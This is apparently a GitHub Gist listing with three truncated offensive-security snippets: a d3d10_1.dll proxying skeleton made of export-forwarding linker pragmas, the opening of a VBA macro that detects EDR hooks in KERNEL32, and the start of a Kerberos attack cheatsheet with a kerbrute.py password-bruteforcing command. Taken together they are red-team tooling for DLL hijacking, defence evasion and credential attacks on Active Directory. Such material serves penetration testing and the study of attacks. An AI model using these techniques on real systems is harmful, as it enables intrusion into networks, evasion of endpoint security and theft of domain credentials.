@tamir-white-hat
tamir-white-hat / d3d10_1-dll-proxying.cpp
Created April 9, 2022 11:46
d3d10_1.dll DLL proxying
#pragma comment(linker,"/export:D3D10CompileEffectFromMemory=d3d10_1_orig.D3D10CompileEffectFromMemory,@1")
#pragma comment(linker,"/export:D3D10CompileShader=d3d10_1_orig.D3D10CompileShader,@2")
#pragma comment(linker,"/export:D3D10CreateBlob=d3d10_1_orig.D3D10CreateBlob,@3")
#pragma comment(linker,"/export:D3D10CreateDevice1=d3d10_1_orig.D3D10CreateDevice1,@4")
#pragma comment(linker,"/export:D3D10CreateDeviceAndSwapChain1=d3d10_1_orig.D3D10CreateDeviceAndSwapChain1,@5")
#pragma comment(linker,"/export:D3D10CreateEffectFromMemory=d3d10_1_orig.D3D10CreateEffectFromMemory,@6")
#pragma comment(linker,"/export:D3D10CreateEffectPoolFromMemory=d3d10_1_orig.D3D10CreateEffectPoolFromMemory,@7")
#pragma comment(linker,"/export:D3D10CreateStateBlock=d3d10_1_orig.D3D10CreateStateBlock,@8")
#pragma comment(linker,"/export:D3D10DisassembleEffect=d3d10_1_orig.D3D10DisassembleEffect,@9")
#pragma comment(linker,"/export:D3D10DisassembleShader=d3d10_1_orig.D3D10DisassembleShader,@10")
@X-C3LL
X-C3LL / hookdetector.vba
Created December 7, 2020 22:31
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: